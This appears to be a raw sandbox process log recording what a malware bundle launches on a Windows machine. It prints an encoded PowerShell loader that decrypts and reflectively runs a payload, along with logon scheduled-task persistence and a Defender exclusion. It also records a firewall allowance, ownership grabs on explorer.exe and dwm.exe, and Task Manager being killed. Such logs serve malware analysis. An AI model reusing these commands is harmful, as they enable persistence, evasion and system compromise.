"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,9935317460879055041,7039101043739041263,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
C:\Windows\SysWOW64\cipher.exe
cipher /e
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\helper.vbs"
C:\Windows\system32\efsui.exe
efsui.exe /efs /keybackup
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
C:\Windows\SysWOW64\PING.EXE
ping google.com -t -n 1 -s 4 -4
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5552 /prefetch:8
C:\Windows\SysWOW64\cipher.exe
cipher /e
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5552 /prefetch:8
C:\Windows\SysWOW64\cipher.exe
cipher /e
C:\Windows\SysWOW64\cipher.exe
cipher /e
C:\Windows\SysWOW64\PING.EXE
ping mrbeast.codes -t -n 1 -s 4 -4
C:\Windows\SysWOW64\xcopy.exe
xcopy Google.exe C:\Users\Admin\Desktop
C:\Windows\SysWOW64\xcopy.exe
xcopy Rover.exe C:\Users\Admin\Desktop
C:\Windows\SysWOW64\xcopy.exe
xcopy spinner.gif C:\Users\Admin\Desktop
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K bloatware.cmd
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\regmess.exe
regmess.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\1.exe
1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_091a4519-6c19-48cd-b05f-a90fb69c0301\regmess.bat" "
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe
3.exe
C:\Windows\SysWOW64\reg.exe
reg import Setup.reg /reg:32
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\reg.exe
reg import Console.reg /reg:32
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K SilentSetup.cmd
C:\Windows\SysWOW64\reg.exe
reg import Desktop.reg /reg:32
C:\Windows\SysWOW64\reg.exe
reg import International.reg /reg:32
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe
WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$10396,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT
C:\Windows\SysWOW64\reg.exe
reg import Fonts.reg /reg:32
C:\Windows\SysWOW64\reg.exe
reg import Cursors.reg /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5736 -ip 5736
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1784
C:\Windows\SysWOW64\taskkill.exe
taskkill /im winaerotweaker.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im winaerotweakerhelper.exe /f
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\0378038449fa4d9682e5b8e5c711d22a /t 6204 /p 6200
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\scary.exe
scary.exe
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\the.exe
the.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\wimloader.dll
wimloader.dll
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_582d51cd-8c29-4269-841f-5d7e9d03a993\caller.cmd" "
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hTlYQIUO0h1A.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\ac3.exe
ac3.exe
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\shell1.ps1"
C:\Windows\SysWOW64\PING.EXE
ping trustsentry.com -t -n 1 -s 4 -4
C:\Windows\SysWOW64\PING.EXE
ping ya.ru -t -n 1 -s 4 -4
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EZQihT05n9bv.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\PING.EXE
ping tria.ge -t -n 1 -s 4 -4
C:\Windows\SysWOW64\xcopy.exe
xcopy bloatware C:\Users\Admin\Desktop
C:\Windows\SysWOW64\xcopy.exe
xcopy beastify.url C:\Users\Admin\Desktop
C:\Windows\SysWOW64\xcopy.exe
xcopy shell1.ps1 C:\Users\Admin\Desktop
C:\Windows\SysWOW64\takeown.exe
takeown /R /F C:\Windows\explorer.exe
C:\Windows\SysWOW64\icacls.exe
icacls c:\Windows\explorer.exe /grant Admin:(F)
C:\Windows\SysWOW64\takeown.exe
takeown /R /F C:\Windows\System32\dwm.exe
C:\Windows\SysWOW64\icacls.exe
icacls c:\Windows\System32\dwm.exe /grant Admin:(F)
C:\Windows\SysWOW64\xcopy.exe
xcopy xcer.cer C:\Users\Admin\Desktop
C:\Windows\SysWOW64\timeout.exe
timeout /t 15
C:\Windows\SysWOW64\timeout.exe
timeout /t 15
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\the.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\freebobux.exe
freebobux.exe
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\SolaraBootstraper.exe
SolaraBootstraper.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im ctfmon.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\wim.dll
wim.dll
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3DF9.tmp\freebobux.bat""
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wim_74b2ead3-07c5-459f-a40d-b1a98d31497f\load.cmd" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HncuP1qJTS5v.bat" "
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe
"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\AppData\Local\Temp\3DF9.tmp\CLWCP.exe
clwcp c:\temp\bg.bmp
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_74b2ead3-07c5-459f-a40d-b1a98d31497f\cringe.mp4"
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_74b2ead3-07c5-459f-a40d-b1a98d31497f\lol.ini
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\web2.htm
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1856 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\xcer.cer
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3DF9.tmp\x.vbs"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LWt94Dub5LFs.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rZmMfjD5k7eK.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe
f3cb220f1aaa32ca310586e5f62dcab1.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 15
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x78,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
